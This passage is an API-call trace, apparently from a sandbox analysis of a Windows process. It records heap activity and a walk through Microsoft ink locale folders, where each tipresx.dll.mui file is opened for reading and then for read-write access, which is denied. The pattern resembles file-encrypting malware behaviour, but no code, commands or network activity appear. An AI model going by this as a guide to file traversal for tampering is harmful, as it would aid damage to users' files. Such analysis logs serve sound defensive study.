(HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0100.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0100.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0100.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0100.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d370 [0100.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0100.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.720] AreFileApisANSI () returned 1 [0100.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0100.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.721] AreFileApisANSI () returned 1 [0100.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.721] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x856c0 [0100.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x856c0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui") returned 73 [0100.721] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.721] GetFileType (hFile=0x27c) returned 0x1 [0100.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x856c0 | out: hHeap=0x20000) returned 1 [0100.721] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.721] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.721] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.722] CloseHandle (hObject=0x27c) returned 1 [0100.722] AreFileApisANSI () returned 1 [0100.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85940 [0100.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d790, cbMultiByte=-1, lpWideCharStr=0x85940, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui") returned 73 [0100.722] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.722] GetLastError () returned 0x5 [0100.722] GetLastError () returned 0x5 [0100.722] SetLastError (dwErrCode=0x5) [0100.722] GetLastError () returned 0x5 [0100.722] SetLastError (dwErrCode=0x5) [0100.722] GetLastError () returned 0x5 [0100.722] SetLastError (dwErrCode=0x5) [0100.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85940 | out: hHeap=0x20000) returned 1 [0100.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0100.722] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.722] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.722] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c8f8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⨀")) returned 0 [0100.723] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0100.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0100.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0100.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0100.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0100.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0100.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0100.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0100.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0100.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0100.723] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.723] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.723] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.723] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0100.723] AreFileApisANSI () returned 1 [0100.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI", lpUsedDefaultChar=0x0) returned 57 [0100.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0100.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.724] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.724] AreFileApisANSI () returned 1 [0100.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0100.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI") returned 57 [0100.724] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.724] GetLastError () returned 0x5 [0100.724] GetLastError () returned 0x5 [0100.724] SetLastError (dwErrCode=0x5) [0100.724] GetLastError () returned 0x5 [0100.724] SetLastError (dwErrCode=0x5) [0100.724] GetLastError () returned 0x5 [0100.724] SetLastError (dwErrCode=0x5) [0100.724] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0100.724] AreFileApisANSI () returned 1 [0100.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.724] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0100.724] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI") returned 57 [0100.725] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.725] GetLastError () returned 0x5 [0100.725] GetLastError () returned 0x5 [0100.725] SetLastError (dwErrCode=0x5) [0100.725] GetLastError () returned 0x5 [0100.725] SetLastError (dwErrCode=0x5) [0100.725] GetLastError () returned 0x5 [0100.725] SetLastError (dwErrCode=0x5) [0100.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0100.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0100.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.725] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0100.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0100.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0100.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0100.725] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c7ae2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~1")) returned 1 [0100.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.725] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0100.725] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0100.726] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78150 [0100.726] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ec25, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.726] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3af7a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0100.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.726] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0100.726] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cc38 [0100.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cc38 | out: hHeap=0x20000) returned 1 [0100.727] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.727] AreFileApisANSI () returned 1 [0100.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0100.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.727] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0100.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.727] AreFileApisANSI () returned 1 [0100.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.727] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85620 [0100.727] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85620, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui") returned 73 [0100.727] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.727] GetFileType (hFile=0x27c) returned 0x1 [0100.728] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85620 | out: hHeap=0x20000) returned 1 [0100.728] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.728] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.728] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.728] CloseHandle (hObject=0x27c) returned 1 [0100.728] AreFileApisANSI () returned 1 [0100.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.728] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0100.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui") returned 73 [0100.728] CreateFileW (lpFileName="C:\\Program Files\\Common 